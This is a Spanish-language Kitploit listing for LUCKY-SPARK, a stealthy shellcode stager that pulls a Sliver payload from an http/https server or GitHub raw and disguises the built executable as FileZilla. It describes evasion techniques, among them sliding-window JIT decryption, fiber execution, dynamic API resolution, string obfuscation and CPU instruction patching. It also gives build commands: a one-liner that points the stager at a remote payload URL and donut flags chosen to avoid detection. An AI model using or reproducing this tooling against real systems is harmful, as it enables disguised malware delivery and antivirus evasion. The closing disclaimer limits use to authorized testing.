Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Lucky-Spark — Un stager sigiloso diseñado para cargas útiles de shellcode preparadas con http/https como Sliver, o en raw de GitHub. | Kitploit
Herramientas/GitHubGitHub/schich/lucky-spark
ExplotaciónShellcodePost-ExplotaciónAnálisis de MalwarePruebas de PenetraciónComando y ControlAnálisis de BinariosRed TeamingDesarrollo de Payloads
GitHubschich/lucky-spark

Lucky-Spark

Un stager sigiloso diseñado para cargas útiles de shellcode preparadas con http/https como Sliver, o en raw de GitHub.

5882hace 1 mesRevisado por Kitploit
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

LUCKY-SPARK

⟪ LUCKY-SPARK ⟫ es un stager diseñado para cargas útiles de shellcode almacenadas con http/https como Sliver o en GitHub raw. Utiliza métodos modernos de ofuscación y evasión como el descifrado justo a tiempo de ventana deslizante del payload y el parcheo de instrucciones de CPU. Por defecto, crea un ejecutable que se hace pasar por el cliente FTP FileZilla.


Características

  • Cargador de Payload Staged de Sliver Descarga y ejecuta un payload de Sliver desde un servidor especificado.
  • Descifrado JIT de Shellcode Descifra solo una ventana deslizante del payload para minimizar la exposición.
  • Ejecución basada en Fibras Ejecuta shellcode dentro de fibras para mejorar el sigilo y complicar el análisis.
  • Resolución Dinámica de API Las funciones de API de Windows sospechosas o propensas a detección se cargan dinámicamente en tiempo de ejecución.
  • Ofuscación de Cadenas Las cadenas sensibles (por ejemplo, URLs, agentes de usuario) se cifran usando un cifrado afín y se almacenan ofuscadas en el binario compilado.
  • Parcheo de instrucciones de CPU Las instrucciones de CPU aes están ocultas detrás de instrucciones de CPU no sospechosas como pmulqd y se parchean después de la ejecución.
  • Disfraz Automático El EXE se disfraza automáticamente como FileZilla con manifiesto, información de versión e iconos adecuados.
  • User-Agent Personalizable Soporta especificar una cadena User-Agent personalizada para peticiones de red.

Instalación

Clona o descarga el repositorio y asegúrate de tener make y instalados en tu sistema.

mingw
root@kitploit:~
git clone <repository_url>
cd LUCKY-SPARK

Uso

Interactivo

Ejecuta el script de creación del binario.

root@kitploit:~
./luckySpark.sh

se te pedirá que ingreses la URL de tu payload staged y un User-Agent opcional. Interactive

Una línea

Se puede ejecutar en una línea para poder ser implementado en scripts:

root@kitploit:~
./luckySpark.sh -u https://github.com/GITHUBNAME/PAYLOADREPO/raw/refs/heads/main/PAYLOAD.bin -a "Mozilla/5.0"

One Line

Sugerencias de Payload

Si usas donut o Sliver (que usa donut) recomiendo estos flags para crear el payload:

root@kitploit:~
donut.exe -i examplePayload.exe -a 2 -e 1 -z 1 -b 1 -o payload.bin

Esto evita comportamientos sospechosos y marcados por donut. Especialmente la evasión de donut está muy marcada irónicamente.

Ejecutar el Loader

Esto crea un binario filezilla.exe que al ejecutarse recupera y ejecuta el payload.


Staging de un Payload

Este stager fue diseñado para ser usado con Sliver. Realiza el staging de un payload de Sliver como se describe aquí Sliver Staging No cifres el payload.

Pero cualquier método de staging basado en http/https funcionará. como python3 -m http.server o un payload subido a github.com en un repositorio público.

Este stager NO soporta el protocolo de staging de meterpreter.


Ventana Deslizante JITD

root@kitploit:~
Step 1: RIP hits Page 0 and Page 0 gets decrypted 
  Pages:           [  D  |  E  |  E  | ... ]
  RIP ->              ^

Step 2: RIP hits Page 1 and Page 1 gets decrypted 
  Pages:           [  D  |  D  |  E  | ... ]
  RIP ->                    ^

Step 3: RIP hits Page 2 and Page 2 gets decrypted. Page 0 gets encrypted
  Pages:           [  E  |  D  |  D  | ... ]
  RIP ->                          ^

Cómo funciona:

  1. Cuando RIP alcanza una página protegida, el manejador VEH descifra esa página.
  2. La página más antigua en la ventana de 3 páginas se vuelve a cifrar.
  3. Solo las últimas dos páginas están descifradas, el resto permanecen protegidas.
  4. Esta “ventana deslizante” se mueve con RIP a medida que el código se ejecuta.

VT


Seguridad y Descargo de Responsabilidad

LUCKY-SPARK está destinado únicamente para fines educativos, de investigación y pruebas de penetración autorizadas. El uso no autorizado contra sistemas sin permiso es ilegal y poco ético.

Descargar herramienta